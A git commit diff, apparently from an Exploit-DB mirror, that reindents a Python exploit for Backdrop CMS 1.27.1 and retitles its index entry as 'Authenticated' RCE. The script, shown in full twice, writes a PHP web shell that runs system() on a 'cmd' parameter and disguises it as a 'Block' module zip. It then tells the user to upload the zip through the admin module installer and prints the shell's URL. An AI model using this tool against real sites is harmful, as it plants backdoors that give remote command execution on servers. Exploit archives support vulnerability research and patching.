Merge remote-tracking branch 'upstream/main'

CERTCC · Jun 10, 2024 · 81a82c4 · 81a82c4
2 parents e90b609 + a99f08b
commit 81a82c4
Show file tree

Hide file tree

Showing 2 changed files with 70 additions and 75 deletions.
diff --git a/exploits/php/webapps/52021.py b/exploits/php/webapps/52021.py
@@ -1,4 +1,4 @@
-# Exploit Title: Backdrop CMS 1.27.1 - Remote Command Execution (RCE)
+# Exploit Title: Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)
 # Date: 04/27/2024
 # Exploit Author: Ahmet Ümit BAYRAM
 # Vendor Homepage: https://backdropcms.org/
@@ -10,88 +10,83 @@
 import time
 import zipfile
 
-
-
 def create_files():
-info_content = """
-type = module
-name = Block
-description = Controls the visual building blocks a page is constructed
-with. Blocks are boxes of content rendered into an area, or region, of a
-web page.
-package = Layouts
-tags[] = Blocks
-tags[] = Site Architecture
-version = BACKDROP_VERSION
-backdrop = 1.x
-
-configure = admin/structure/block
-
-; Added by Backdrop CMS packaging script on 2024-03-07
-project = backdrop
-version = 1.27.1
-timestamp = 1709862662
-"""
-shell_info_path = "shell/shell.info"
-os.makedirs(os.path.dirname(shell_info_path), exist_ok=True) # Klasörü
-oluşturur
-with open(shell_info_path, "w") as file:
-file.write(info_content)
-
-shell_content = """
-<html>
-<body>
-<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
-<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
-<input type="SUBMIT" value="Execute">
-</form>
-<pre>
-<?php
-if(isset($_GET['cmd']))
-{
-system($_GET['cmd']);
-}
-?>
-</pre>
-</body>
-</html>
-"""
-shell_php_path = "shell/shell.php"
-with open(shell_php_path, "w") as file:
-file.write(shell_content)
-
-return shell_info_path, shell_php_path
+    info_content = """
+    type = module
+    name = Block
+    description = Controls the visual building blocks a page is constructed
+    with. Blocks are boxes of content rendered into an area, or region, of a
+    web page.
+    package = Layouts
+    tags[] = Blocks
+    tags[] = Site Architecture
+    version = BACKDROP_VERSION
+    backdrop = 1.x
+
+    configure = admin/structure/block
+
+    ; Added by Backdrop CMS packaging script on 2024-03-07
+    project = backdrop
+    version = 1.27.1
+    timestamp = 1709862662
+    """
+    shell_info_path = "shell/shell.info"
+    os.makedirs(os.path.dirname(shell_info_path), exist_ok=True)  # Klasörüoluşturur
+    with open(shell_info_path, "w") as file:
+        file.write(info_content)
+
+    shell_content = """
+    <html>
+    <body>
+    <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
+    <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
+    <input type="SUBMIT" value="Execute">
+    </form>
+    <pre>
+    <?php
+    if(isset($_GET['cmd']))
+    {
+    system($_GET['cmd']);
+    }
+    ?>
+    </pre>
+    </body>
+    </html>
+    """
+    shell_php_path = "shell/shell.php"
+    with open(shell_php_path, "w") as file:
+        file.write(shell_content)
+    return shell_info_path, shell_php_path
 
 def create_zip(info_path, php_path):
-zip_filename = "shell.zip"
-with zipfile.ZipFile(zip_filename, 'w') as zipf:
-# Dosyaları shell klasörü altında sakla
-zipf.write(info_path, arcname='shell/shell.info')
-zipf.write(php_path, arcname='shell/shell.php')
-return zip_filename
+    zip_filename = "shell.zip"
+    with zipfile.ZipFile(zip_filename, 'w') as zipf:
+        zipf.write(info_path, arcname='shell/shell.info')
+        zipf.write(php_path, arcname='shell/shell.php')
+    return zip_filename
 
 def main(url):
-print("Backdrop CMS 1.27.1 - Remote Command Execution Exploit")
-time.sleep(3)
+    print("Backdrop CMS 1.27.1 - Remote Command Execution Exploit")
+    time.sleep(3)
 
-print("Evil module generating...")
-time.sleep(2)
+    print("Evil module generating...")
+    time.sleep(2)
 
-info_path, php_path = create_files()
-zip_filename = create_zip(info_path, php_path)
+    info_path, php_path = create_files()
+    zip_filename = create_zip(info_path, php_path)
 
-print("Evil module generated!", zip_filename)
-time.sleep(2)
+    print("Evil module generated!", zip_filename)
+    time.sleep(2)
 
-print("Go to " + url + "/admin/modules/install and upload the " +
-zip_filename + " for Manual Installation.")
-time.sleep(2)
+    print("Go to " + url + "/admin/modules/install and upload the " +
+          zip_filename + " for Manual Installation.")
+    time.sleep(2)
 
-print("Your shell address:", url + "/modules/shell/shell.php")
+    print("Your shell address:", url + "/modules/shell/shell.php")
 
 if __name__ == "__main__":
-import sys
-if len(sys.argv) < 2:
-print("Usage: python script.py [url]")
-else:
-main(sys.argv[1])
+    import sys
+    if len(sys.argv) < 2:
+        print("Usage: python script.py [url]")
+    else:
+        main(sys.argv[1])
diff --git a/files_exploits.csv b/files_exploits.csv
@@ -14593,7 +14593,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34828,exploits/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 - Cross-Site Scripting",2010-10-06,"High-Tech Bridge SA",webapps,php,,2010-10-06,2014-09-30,1,,,,,,https://www.securityfocus.com/bid/43910/info
 50323,exploits/php/webapps/50323.html,"Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",2021-09-23,V1n1v131r4,webapps,php,,2021-09-23,2021-09-23,0,,,,,http://www.exploit-db.combackdrop.zip,
 51905,exploits/php/webapps/51905.txt,"Backdrop CMS 1.23.0 - Stored XSS",2024-03-18,"Sinem Şahin",webapps,php,,2024-03-18,2024-03-18,0,,,,,,
-52021,exploits/php/webapps/52021.py,"Backdrop CMS 1.27.1 - Remote Command Execution (RCE)",2024-05-19,"Ahmet Ümit BAYRAM",webapps,php,,2024-05-19,2024-05-19,0,,,,,,
+52021,exploits/php/webapps/52021.py,"Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)",2024-05-19,"Ahmet Ümit BAYRAM",webapps,php,,2024-05-19,2024-06-07,1,,,,,,
 51597,exploits/php/webapps/51597.txt,"Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,,
 5546,exploits/php/webapps/5546.txt,"BackLinkSpider 1.1 - 'cat_id' SQL Injection",2008-05-05,K-159,webapps,php,,2008-05-04,2016-11-25,1,OSVDB-45001;CVE-2008-2096,,,,,http://advisories.echo.or.id/adv/adv95-K-159-2008.txt
 34045,exploits/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' SQL Injection",2010-05-27,"sniper ip",webapps,php,,2010-05-27,2014-07-13,1,,,,,,https://www.securityfocus.com/bid/40398/info